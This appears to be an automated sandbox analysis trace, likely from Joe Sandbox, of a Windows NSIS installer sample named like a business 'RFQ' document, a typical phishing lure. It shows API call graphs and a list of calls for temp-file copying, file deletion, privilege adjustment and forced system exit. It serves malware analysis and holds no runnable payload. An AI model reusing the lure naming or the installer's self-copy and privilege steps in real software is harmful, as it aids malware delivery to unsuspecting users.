3895->3889 3899 405a55 2 API calls 3895->3899 3900 403ab2 3896->3900 4079 406055 lstrcpynW 3897->4079 3899->3889 3901 403b41 3900->3901 3902 403abe ShowWindow 3900->3902 4080 405287 OleInitialize 3901->4080 3903 4063bf 3 API calls 3902->3903 3905 403ad6 3903->3905 3907 403ae4 GetClassInfoW 3905->3907 3910 4063bf 3 API calls 3905->3910 3906 403b47 3908 403b63 3906->3908 3909 403b4b 3906->3909 3912 403af8 GetClassInfoW RegisterClassW 3907->3912 3913 403b0e DialogBoxParamW 3907->3913 3911 40140b 2 API calls 3908->3911 3909->3886 3914 40140b 2 API calls 3909->3914 3910->3907 3911->3886 3912->3913 3915 40140b 2 API calls 3913->3915 3914->3886 3915->3886 3916->3749 4095 406055 lstrcpynW 3917->4095 3919 405b22 4096 405ab4 CharNextW CharNextW 3919->4096 3922 4035c3 3922->3802 3931 406055 lstrcpynW 3922->3931 3923 4062e9 5 API calls 3924 405b38 3923->3924 3924->3922 3925 405b69 lstrlenW 3924->3925 3930 405a55 2 API calls 3924->3930 4102 406398 FindFirstFileW 3924->4102 3925->3924 3926 405b74 3925->3926 3927 405a09 3 API calls 3926->3927 3929 405b79 GetFileAttributesW 3927->3929 3929->3922 3930->3925 3931->3781 3932->3789 3934 4037dc 3933->3934 3935 4037ce CloseHandle 3933->3935 4105 403809 3934->4105 3935->3934 3941 4057af 3940->3941 3942 4057c3 MessageBoxIndirectW 3941->3942 3943 403616 ExitProcess 3941->3943 3942->3943 3945 40642b 5 API calls 3944->3945 3946 403623 lstrcatW 3945->3946 3946->3776 3946->3777 3948 403665 3947->3948 3949 4056d4 GetLastError 3947->3949 3948->3791 3949->3948 3950 4056e3 SetFileSecurityW 3949->3950 3950->3948 3951 4056f9 GetLastError 3950->3951 3951->3948 3953 405710 3952->3953 3954 405714 GetLastError 3952->3954 3953->3791 3954->3953 3955->3792 3956->3804 3966 406084 3957->3966 3958 4062cf 3959 4036c6 DeleteFileW 3958->3959 4164 406055 lstrcpynW 3958->4164 3959->3798 3959->3804 3961 406137 GetVersion 3961->3966 3962 40629d lstrlenW 3962->3966 3965 406077 10 API calls 3965->3962 3966->3958 3966->3961 3966->3962 3966->3965 3967 405f22 3 API calls 3966->3967 3968 4061b2 GetSystemDirectoryW 3966->3968 3969 4061c5 GetWindowsDirectoryW 3966->3969 3970 4062e9 5 API calls 3966->3970 3971 4061f9 SHGetSpecialFolderLocation 3966->3971 3972 406077 10 API calls 3966->3972 3973 40623e lstrcatW 3966->3973 4162 405f9c wsprintfW 3966->4162 4163 406055 lstrcpynW 3966->4163 3967->3966 3968->3966 3969->3966 3970->3966 3971->3966 3974 406211 SHGetPathFromIDListW CoTaskMemFree 3971->3974 3972->3966 3973->3966 3974->3966 3976 405f17 3975->3976 3977 405f0a 3975->3977 3976->3804 4165 405d84 lstrcpyW 3977->4165 3980 405774 3979->3980 3981 405768 CloseHandle 3979->3981 3980->3804 3981->3980 3983 401389 2 API calls 3982->3983 3984 401420 3983->3984 3984->3762 3991 4062f6 3985->3991 3986 40636c 3987 406371 CharPrevW 3986->3987 3989 406392 3986->3989 3987->3986 3988 40635f CharNextW 3988->3986 3988->3991 3989->3825 3990 405a36 CharNextW 3990->3991 3991->3986 3991->3988 3991->3990 3992 40634b CharNextW 3991->3992 3993 40635a CharNextW 3991->3993 3992->3991 3993->3988 3995 40328d 3994->3995 3996 405a25 lstrcatW 3994->3996 3995->3828 3996->3995 3998 405c66 GetTickCount GetTempFileNameW 3997->3998 3999 40329e 3998->3999 4000 405c9c 3998->4000 3999->3739 4000->3998 4000->3999 4001->3834 4002->3836 4004 405a63 4003->4004 4005 402e5a 4004->4005 4006 405a69 CharPrevW 4004->4006 4007 406055 lstrcpynW 4005->4007 4006->4004 4006->4005 4007->3840 4009 402d93 4008->4009 4010 402dab 4008->4010 4011 402da3 4009->4011 4012 402d9c DestroyWindow 4009->4012 4013 402db3 4010->4013 4014 402dbb GetTickCount 4010->4014 4011->3843 4012->4011 4044 406467 4013->4044 4016 402dc9 CreateDialogParamW ShowWindow 4014->4016 4017 402dec 4014->4017 4016->4017 4017->3843 4019->3849 4021 403040 4020->4021 4022 40306e 4021->4022 4050 403258 SetFilePointer 4021->4050 4024 403242 ReadFile 4022->4024 4025 403079 4024->4025 4026 4031db 4025->4026 4027 40308b GetTickCount 4025->4027 4035 4031c5 4025->4035 4028 40321d 4026->4028 4033 4031df 4026->4033 4027->4035 4039 4030da 4027->4039 4029 403242 ReadFile 4028->4029 4029->4035 4030 403242 ReadFile 4030->4039 4031 403242 ReadFile 4031->4033 4032 405cdc WriteFile 4032->4033 4033->4031 4033->4032 4033->4035 4034 403130 GetTickCount 4034->4039 4035->3857 4036 403155 MulDiv wsprintfW 4051 4051b4 4036->4051 4039->4030 4039->4034 4039->4035 4039->4036 4048 405cdc WriteFile 4039->4048 4062 405cad ReadFile 4040->4062 4043->3851 4045 406484 PeekMessageW 4044->4045 4046 402db9 4045->4046 4047 40647a DispatchMessageW 4045->4047 4046->3843 4047->4045 4049 405cfa 4048->4049 4049->4039 4050->4022 4052 405271 4051->4052 4053 4051cf 4051->4053 4052->4039 4054 4051eb lstrlenW 4053->4054 4057 406077 18 API calls 4053->4057 4055 405214 4054->4055 4056 4051f9 lstrlenW 4054->4056 4059 405227 4055->4059 4060 40521a SetWindowTextW 4055->4060 4056->4052 4058 40520b lstrcatW 4056->4058 4057->4054 4058->4055 4059->4052 4061 40522d SendMessageW SendMessageW SendMessageW 4059->4061 4060->4059 4061->4052 4063 403255 4062->4063 4063->3859 4064->3867 4066 403b88 4065->4066 4087 405f9c wsprintfW 4066->4087 4068 403bf9 4069 406077 18 API calls 4068->4069 4070 403c05 SetWindowTextW 4069->4070 4071 403c21 4070->4071 4072 403929 4070->4072 4071->4072 4073 406077 18 API calls 4071->4073 4072->3873 4073->4071 4075 4038fa 4074->4075 4076 405f56 RegQueryValueExW 4074->4076 4075->3869 4075->3870 4078 405f77 RegCloseKey 4076->4078 4078->4075 4079->3875 4088 404165 4080->4088 4082 4052aa 4086 4052d1 4082->4086 4091 401389 4082->4091 4083 404165 SendMessageW 4084 4052e3 OleUninitialize 4083->4084 4084->3906 4086->4083 4087->4068 4089 40417d 4088->4089 4090 40416e SendMessageW 4088->4090 4089->4082 4090->4089 4093 401390 4091->4093 4092 4013fe 4092->4082 4093->4092 4094 4013cb MulDiv SendMessageW 4093->4094 4094->4093 4095->3919 4097 405ad1 4096->4097 4098 405ae3 4096->4098 4097->4098 4099 405ade CharNextW 4097->4099 4100 405b07 4098->4100 4101 405a36 CharNextW 4098->4101 4099->4100 4100->3922 4100->3923 4101->4098 4103 4063b9 4102->4103 4104 4063ae FindClose 4102->4104 4103->3924 4104->4103 4106 403817 4105->4106 4107 4037e1 4106->4107 4108 40381c FreeLibrary GlobalFree 4106->4108 4109 405846 4107->4109 4108->4107 4108->4108 4110 405b11 18 API calls 4109->4110 4111 405866 4110->4111 4112 405885 4111->4112 4113 40586e DeleteFileW 4111->4113 4115 4059b0 4112->4115 4149 406055 lstrcpynW 4112->4149 4114 4035f6 OleUninitialize 4113->4114 4114->3758 4114->3759 4115->4114 4120 406398 2 API calls 4115->4120 4117 4058ab 4118 4058b1 lstrcatW 4117->4118 4119 4058be 4117->4119 4121 4058c4 4118->4121 4122 405a55 2 API calls 4119->4122 4125 4059ca 4120->4125 4123 4058d4 lstrcatW 4121->4123 4124 4058ca 4121->4124 4122->4121 4126 4058df lstrlenW FindFirstFileW 4123->4126 4124->4123 4124->4126 4125->4114 4127 4059ce 4125->4127 4128 405901 4126->4128 4129 4059a5 4126->4129 4130 405a09 3 API calls 4127->4130 4132 405988 FindNextFileW 4128->4132 4142 405846 62 API calls 4128->4142 4144 4051b4 25 API calls 4128->4144 4146 4051b4 25 API calls 4128->4146 4148 405ef6 38 API calls 4128->4148 4150 406055 lstrcpynW 4128->4150 4151 4057fe 4128->4151 4129->4115 4131 4059d4 4130->4131 4133 4057fe 5 API calls 4131->4133 4132->4128 4136 40599e FindClose 4132->4136 4135 4059e0 4133->4135 4137 4059e4 4135->4137 4138 4059fa 4135->4138 4136->4129 4137->4114 4141 4051b4 25 API calls 4137->4141 4139 4051b4 25 API calls 4138->4139 4139->4114 4143 4059f1 4141->4143 4142->4128 4145 405ef6 38 API calls 4143->4145 4144->4132 4147 4059f8 4145->4147 4146->4128 4147->4114 4148->4128 4149->4117 4150->4128 4159 405c05 GetFileAttributesW 4151->4159 4154 40582b 4154->4128 4155 405821 DeleteFileW 4157 405827 4155->4157 4156 405819 RemoveDirectoryW 4156->4157 4157->4154 4158 405837 SetFileAttributesW 4157->4158 4158->4154 4160 40580a 4159->4160 4161 405c17 SetFileAttributesW 4159->4161 4160->4154 4160->4155 4160->4156 4161->4160 4162->3966 4163->3966 4164->3959 4166 405dd2 GetShortPathNameW 4165->4166 4167 405dac 4165->4167 4169 405ef1 4166->4169 4170 405de7 4166->4170 4192 405c2a GetFileAttributesW CreateFileW 4167->4192 4169->3976 4170->4169 4172 405def wsprintfA 4170->4172 4171 405db6 CloseHandle GetShortPathNameW 4171->4169 4173 405dca 4171->4173 4174 406077 18 API calls 4172->4174 4173->4166 4173->4169 4175 405e17 4174->4175 4193 405c2a GetFileAttributesW CreateFileW 4175->4193 4177 405e24 4177->4169 4178 405e33 GetFileSize GlobalAlloc 4177->4178 4179 405e55 4178->4179 4180 405eea CloseHandle 4178->4180 4181 405cad ReadFile 4179->4181 4180->4169 4182 405e5d 4181->4182 4182->4180 4194 405b8f lstrlenA 4182->4194 4185 405e74 lstrcpyA 4188 405e96 4185->4188 4186 405e88 4187 405b8f 4 API calls 4186->4187 4187->4188 4189 405ecd SetFilePointer 4188->4189 4190 405cdc WriteFile 4189->4190 4191 405ee3 GlobalFree 4190->4191 4191->4180 4192->4171 4193->4177 4195 405bd0 lstrlenA 4194->4195 4196 405ba9 lstrcmpiA 4195->4196 4198 405bd8 4195->4198 4197 405bc7 CharNextA 4196->4197 4196->4198 4197->4195 4198->4185 4198->4186 5285 100010e1 5288 10001111 5285->5288 5286 100011d8 GlobalFree 5287 100012ba 2 API calls 5287->5288 5288->5286 5288->5287 5289 100011d3 5288->5289 5290 10001272 2 API calls 5288->5290 5291 10001164 GlobalAlloc 5288->5291 5292 100011f8 GlobalFree 5288->5292 5293 100011c4 GlobalFree 5288->5293 5294 100012e1 lstrcpyW 5288->5294 5289->5286 5290->5293 5291->5288 5292->5288 5293->5288 5294->5288 5295 401ca3 5296 402ba2 18 API calls 5295->5296 5297 401ca9 IsWindow 5296->5297 5298 401a05 5297->5298 5299 402a27 SendMessageW 5300 402a41 InvalidateRect 5299->5300 5301 402a4c 5299->5301 5300->5301 4566 405128 4567 405138 4566->4567 4568 40514c 4566->4568 4570 405195 4567->4570 4571 40513e 4567->4571 4569 405154 IsWindowVisible 4568->4569 4578 405174 4568->4578 4569->4570 4573 405161 4569->4573 4574 40519a CallWindowProcW 4570->4574 4572 404165 SendMessageW 4571->4572 4575 405148 4572->4575 4580 404a7e SendMessageW 4573->4580 4574->4575 4578->4574 4585 404afe 4578->4585 4581 404aa1 GetMessagePos ScreenToClient SendMessageW 4580->4581 4582 404add SendMessageW 4580->4582 4583 404ad5 4581->4583 4584 404ada 4581->4584 4582->4583 4583->4578 4584->4582 4594 406055 lstrcpynW 4585->4594 4587 404b11 4595 405f9c wsprintfW 4587->4595 4589 404b1b 4590 40140b 2 API calls 4589->4590 4591 404b24 4590->4591 4596 406055 lstrcpynW 4591->4596 4593 404b2b 4593->4570 4594->4587 4595->4589 4596->4593 4597 40242a 4608 402cc9 4597->4608 4599 402434 4600 402bbf 18 API calls 4599->4600 4601 40243d 4600->4601 4602 402448 RegQueryValueExW 4601->4602 4603 40281e 4601->4603 4604 402468 4602->4604 4607 40246e RegCloseKey 4602->4607 4604->4607 4612 405f9c wsprintfW 4604->4612 4607->4603 4609 402bbf 18 API calls 4608->4609 4610 402ce2 4609->4610 4611 402cf0 RegOpenKeyExW 4610->4611 4611->4599 4612->4607 5302 40422d lstrcpynW lstrlenW 5303 40172d 5304 402bbf 18 API calls 5303->5304 5305 401734 SearchPathW 5304->5305 5306 40174f 5305->5306 4613 404b30 GetDlgItem GetDlgItem 4614 404b82 7 API calls 4613->4614 4617 404d9b 4613->4617 4615 404c25 DeleteObject 4614->4615 4616 404c18 SendMessageW 4614->4616 4618 404c2e 4615->4618 4616->4615 4624 404e60 4617->4624 4627 404e7f 4617->4627 4631 404dfb 4617->4631 4619 404c65 4618->4619 4620 404c3d 4618->4620 4621 404119 19 API calls 4619->4621 4623 406077 18 API calls 4620->4623 4625 404c79 4621->4625 4622 404f2b 4628 404f35 SendMessageW 4622->4628 4629 404f3d 4622->4629 4630 404c47 SendMessageW SendMessageW 4623->4630 4624->4627 4636 404e71 SendMessageW 4624->4636 4633 404119 19 API calls 4625->4633 4626 405113 4635 404180 8 API calls 4626->4635 4627->4622 4627->4626 4634 404ed8 SendMessageW 4627->4634 4628->4629 4637 404f56 4629->4637 4638 404f4f ImageList_Destroy 4629->4638 4645 404f66 4629->4645 4630->4618 4632 404a7e 5 API calls 4631->4632 4650 404e0c 4632->4650 4651 404c87 4633->4651 4634->4626 4640 404eed SendMessageW 4634->4640 4641 405121 4635->4641 4636->4627 4642 404f5f GlobalFree 4637->4642 4637->4645 4638->4637 4639 4050d5 4639->4626 4646 4050e7 ShowWindow GetDlgItem ShowWindow 4639->4646 4644 404f00 4640->4644 4642->4645 4643 404d5c GetWindowLongW SetWindowLongW 4647 404d75 4643->4647 4655 404f11 SendMessageW 4644->4655 4645->4639 4660 404afe 4 API calls 4645->4660 4663 404fa1 4645->4663 4646->4626 4648 404d93 4647->4648 4649 404d7b ShowWindow 4647->4649 4670 40414e SendMessageW 4648->4670 4669 40414e SendMessageW 4649->4669 4650->4624 4651->4643 4654 404cd7 SendMessageW 4651->4654 4656 404d56 4651->4656 4658 404d13 SendMessageW 4651->4658 4659 404d24 SendMessageW 4651->4659 4654->4651 4655->4622 4656->4643 4656->4647 4657 404d8e 4657->4626 4658->4651 4659->4651 4660->4663 4661 4050ab InvalidateRect 4661->4639 4662 4050c1 4661->4662 4671 404a39 4662->4671 4664 404fcf SendMessageW 4663->4664 4665 404fe5 4663->4665 4664->4665 4665->4661 4666 405046 4665->4666 4668 405059 SendMessageW SendMessageW 4665->4668 4666->4668 4668->4665 4669->4657 4670->4617 4674 404970 4671->4674 4673 404a4e 4673->4639 4675 404989 4674->4675 4676 406077 18 API calls 4675->4676 4677 4049ed 4676->4677 4678 406077 18 API calls 4677->4678 4679 4049f8 4678->4679 4680 406077 18 API calls 4679->4680 4681 404a0e lstrlenW wsprintfW SetDlgItemTextW 4680->4681 4681->4673 5307 4045b4 5308 4045e0 5307->5308 5309 4045f1 5307->5309 5368 40577e GetDlgItemTextW 5308->5368 5310 4045fd GetDlgItem 5309->5310 5313 40465c 5309->5313 5312 404611 5310->5312 5317 404625 SetWindowTextW 5312->5317 5320 405ab4 4 API calls 5312->5320 5314 404740 5313->5314 5322 406077 18 API calls 5313->5322 5366 4048ef 5313->5366 5314->5366 5370 40577e GetDlgItemTextW 5314->5370 5315 4045eb 5316 4062e9 5 API calls 5315->5316 5316->5309 5321 404119 19 API calls 5317->5321 5319 404180 8 API calls 5324 404903 5319->5324 5325 40461b 5320->5325 5326 404641 5321->5326 5327 4046d0 SHBrowseForFolderW 5322->5327 5323 404770 5328 405b11 18 API calls 5323->5328 5325->5317 5332 405a09 3 API calls 5325->5332 5329 404119 19 API calls 5326->5329 5327->5314 5330 4046e8 CoTaskMemFree 5327->5330 5331 404776 5328->5331 5333 40464f 5329->5333 5334 405a09 3 API calls 5330->5334 5371 406055 lstrcpynW 5331->5371 5332->5317 5369 40414e SendMessageW 5333->5369 5342 4046f5 5334->5342 5337 404655 5341 40642b 5 API calls 5337->5341 5338 40472c SetDlgItemTextW 5338->5314 5339 40478d 5340 40642b 5 API calls 5339->5340 5349 404794 5340->5349 5341->5313 5342->5338 5343 406077 18 API calls 5342->5343 5344 404714 lstrcmpiW 5343->5344 5344->5338 5346 404725 lstrcatW 5344->5346 5345 4047d5 5372 406055 lstrcpynW 5345->5372 5346->5338 5348 4047dc 5350 405ab4 4 API calls 5348->5350 5349->5345 5354 405a55 2 API calls 5349->5354 5355 40482d 5349->5355 5351 4047e2 GetDiskFreeSpaceW 5350->5351 5353 404806 MulDiv 5351->5353 5351->5355 5353->5355 5354->5349 5356 40489e 5355->5356 5358 404a39 21 API calls 5355->5358 5357 4048c1 5356->5357 5359 40140b 2 API calls 5356->5359 5373 40413b EnableWindow 5357->5373 5360 40488b 5358->5360 5359->5357 5361 4048a0 SetDlgItemTextW 5360->5361 5362 404890 5360->5362 5361->5356 5364 404970 21 API calls 5362->5364 5364->5356 5365 4048dd 5365->5366 5374 404549 5365->5374 5366->5319 5368->5315 5369->5337 5370->5323 5371->5339 5372->5348 5373->5365 5375 404557 5374->5375 5376 40455c SendMessageW 5374->5376 5375->5376 5376->5366 5377 4027b4 5378 4027ba 5377->5378 5379 4027c2 FindClose 5378->5379 5380 402a4c 5378->5380 5379->5380 5381 4042b6 5382 4042ce 5381->5382 5386 4043e8 5381->5386 5387 404119 19 API calls 5382->5387 5383 404452 5384 404524 5383->5384 5385 40445c GetDlgItem 5383->5385 5391 404180 8 API calls 5384->5391 5388 404476 5385->5388 5392 4044e5 5385->5392 5386->5383 5386->5384 5389 404423 GetDlgItem SendMessageW 5386->5389 5390 404335 5387->5390 5388->5392 5396 40449c 6 API calls 5388->5396 5412 40413b EnableWindow 5389->5412 5394 404119 19 API calls 5390->5394 5395 40451f 5391->5395 5392->5384 5397 4044f7 5392->5397 5401 404342 CheckDlgButton 5394->5401 5396->5392 5398 40450d 5397->5398 5399 4044fd SendMessageW 5397->5399 5398->5395 5402 404513 SendMessageW 5398->5402 5399->5398 5400 40444d 5403 404549 SendMessageW 5400->5403 5410 40413b EnableWindow 5401->5410 5402->5395 5403->5383 5405 404360 GetDlgItem 5411 40414e SendMessageW 5405->5411 5407 404376 SendMessageW 5408 404393 GetSysColor 5407->5408 5409 40439c SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5407->5409 5408->5409 5409->5395 5410->5405 5411->5407 5412->5400 4704 401b37 4705 401b44 4704->4705 4706 401b88 4704->4706 4707 401bcd 4705->4707 4712 401b5b 4705->4712 4708 401bb2 GlobalAlloc 4706->4708 4709 401b8d 4706->4709 4711 406077 18 API calls 4707->4711 4719 402288 4707->4719 4710 406077 18 API calls 4708->4710 4709->4719 4725 406055 lstrcpynW 4709->4725 4710->4707 4713 402282 4711->4713 4723 406055 lstrcpynW 4712->4723 4717 40579a MessageBoxIndirectW 4713->4717 4716 401b9f GlobalFree 4716->4719 4717->4719 4718 401b6a 4724 406055 lstrcpynW 4718->4724 4721 401b79 4726 406055 lstrcpynW 4721->4726 4723->4718 4724->4721 4725->4716 4726->4719 5413 402537 5414 402562 5413->5414 5415 40254b 5413->5415 5417 402596 5414->5417 5418 402567 5414->5418 5416 402ba2 18 API calls 5415->5416 5425 402552 5416->5425 5419 402bbf 18 API calls 5417->5419 5420 402bbf 18 API calls 5418->5420 5421 40259d lstrlenW 5419->5421 5422 40256e WideCharToMultiByte lstrlenA 5420->5422 5421->5425 5422->5425 5423 4025ca 5424 4025e0 5423->5424 5426 405cdc WriteFile 5423->5426 5425->5423 5425->5424 5427 405d0b 5 API calls 5425->5427 5426->5424 5427->5423 5428 4014b8 5429 4014be 5428->5429 5430 401389 2 API calls 5429->5430 5431 4014c6 5430->5431 4733 4015b9 4734 402bbf 18 API calls 4733->4734 4735 4015c0 4734->4735 4736 405ab4 4 API calls 4735->4736 4748 4015c9 4736->4748 4737 401629 4738 40165b 4737->4738 4739 40162e 4737->4739 4743 401423 25 API calls 4738->4743 4741 401423 25 API calls 4739->4741 4740 405a36 CharNextW 4740->4748 4742 401635 4741->4742 4752 406055 lstrcpynW 4742->4752 4750 401653 4743->4750 4745 405700 2 API calls 4745->4748 4746 40571d 5 API calls 4746->4748 4747 401642 SetCurrentDirectoryW 4747->4750 4748->4737 4748->4740 4748->4745 4748->4746 4749 40160f GetFileAttributesW 4748->4749 4751 405683 4 API calls 4748->4751 4749->4748 4751->4748 4752->4747 5432 10002a7f 5433 10002a97 5432->5433 5434 1000158f 2 API calls 5433->5434 5435 10002ab2 5434->5435

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 4032a0-4032d2 SetErrorMode GetVersion 1 4032d4-4032dc call 40642b 0->1 2 4032e5-403378 call 4063bf * 3 call 40642b * 2 #17 OleInitialize SHGetFileInfoW call 406055 GetCommandLineW call 406055 GetModuleHandleW 0->2 1->2 7 4032de 1->7 20 403382-40339c call 405a36 CharNextW 2->20 21 40337a-403381 2->21 7->2 24 4033a2-4033a8 20->24 25 4034b4-4034ce GetTempPathW call 40326f 20->25 21->20 27 4033b1-4033b7 24->27 28 4033aa-4033af 24->28 34 4034d0-4034ee GetWindowsDirectoryW lstrcatW call 40326f 25->34 35 403526-403540 DeleteFileW call 402dee 25->35 30 4033b9-4033bd 27->30 31 4033be-4033c2 27->31 28->27 28->28 30->31 32 403480-40348d call 405a36 31->32 33 4033c8-4033ce 31->33 53 403491-403497 32->53 54 40348f-403490 32->54 36 4033d0-4033d7 33->36 37 4033e8-403421 33->37 34->35 52 4034f0-403520 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40326f 34->52 48 4035f1-403602 call 4037c4 OleUninitialize 35->48 49 403546-40354c 35->49 42 4033d9-4033dc 36->42 43 4033de 36->43 44 403423-403428 37->44 45 40343e-403478 37->45 42->37 42->43 43->37 44->45 50 40342a-403432 44->50 45->32 51 40347a-40347e 45->51 71 403728-40372e 48->71 72 403608-403618 call 40579a ExitProcess 48->72 56 4035e1-4035e8 call 40389e 49->56 57 403552-40355d call 405a36 49->57 59 403434-403437 50->59 60 403439 50->60 51->32 61 40349f-4034ad call 406055 51->61 52->35 52->48 53->24 55 40349d 53->55 54->53 63 4034b2 55->63 70 4035ed 56->70 73 4035ab-4035b5 57->73 74 40355f-403594 57->74 59->45 59->60 60->45 61->63 63->25 70->48 76 403730-403746 GetCurrentProcess OpenProcessToken 71->76 77 4037ac-4037b4 71->77 81 4035b7-4035c5 call 405b11 73->81 82 40361e-403632 call 40571d lstrcatW 73->82 78 403596-40359a 74->78 84 403748-403776 LookupPrivilegeValueW AdjustTokenPrivileges 76->84 85 40377c-40378a call 40642b 76->85 79 4037b6 77->79 80 4037ba-4037be ExitProcess 77->80 87 4035a3-4035a7 78->87 88 40359c-4035a1 78->88 79->80 81->48 97 4035c7-4035dd call 406055 * 2 81->97 98 403634-40363a lstrcatW 82->98 99 40363f-403659 lstrcatW lstrcmpiW 82->99 84->85 95 403798-4037a3 ExitWindowsEx 85->95 96 40378c-403796 85->96 87->78 92 4035a9 87->92 88->87 88->92 92->73 95->77 101 4037a5-4037a7 call 40140b 95->101 96->95 96->101 97->56 98->99 99->48 100 40365b-40365e 99->100 104 403660-403665 call 405683 100->104 105 403667 call 405700 100->105 101->77 113 40366c-40367a SetCurrentDirectoryW 104->113 105->113 114 403687-4036b0 call 406055 113->114 115 40367c-403682 call 406055 113->115 119 4036b5-4036d1 call 406077 DeleteFileW 114->119 115->114 122 403712-40371a 119->122 123 4036d3-4036e3 CopyFileW 119->123 122->119 125 40371c-403723 call 405ef6 122->125 123->122 124 4036e5-403705 call 405ef6 call 406077 call 405735 123->124 124->122 134 403707-40370e CloseHandle 124->134 125->48 134->122
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNELBASE ref: 004032C2
                                                                                                            • GetVersion.KERNEL32 ref: 004032C8
                                                                                                            • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                            • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
                                                                                                            • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe",00000000), ref: 00403363
                                                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe",00000020), ref: 0040338A
                                                                                                              • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                              • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C5
                                                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D6
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034E2
                                                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F6
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FE
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350F
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403517
                                                                                                            • DeleteFileW.KERNELBASE(1033), ref: 0040352B
                                                                                                              • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                            • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                            • ExitProcess.KERNEL32 ref: 00403618
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe",00000000,?), ref: 0040362B
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe",00000000,?), ref: 0040363A
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe",00000000,?), ref: 00403645
                                                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe",00000000,?), ref: 00403651
                                                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040366D
                                                                                                            • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe,0042AA28,00000001), ref: 004036DB
                                                                                                            • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                            • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
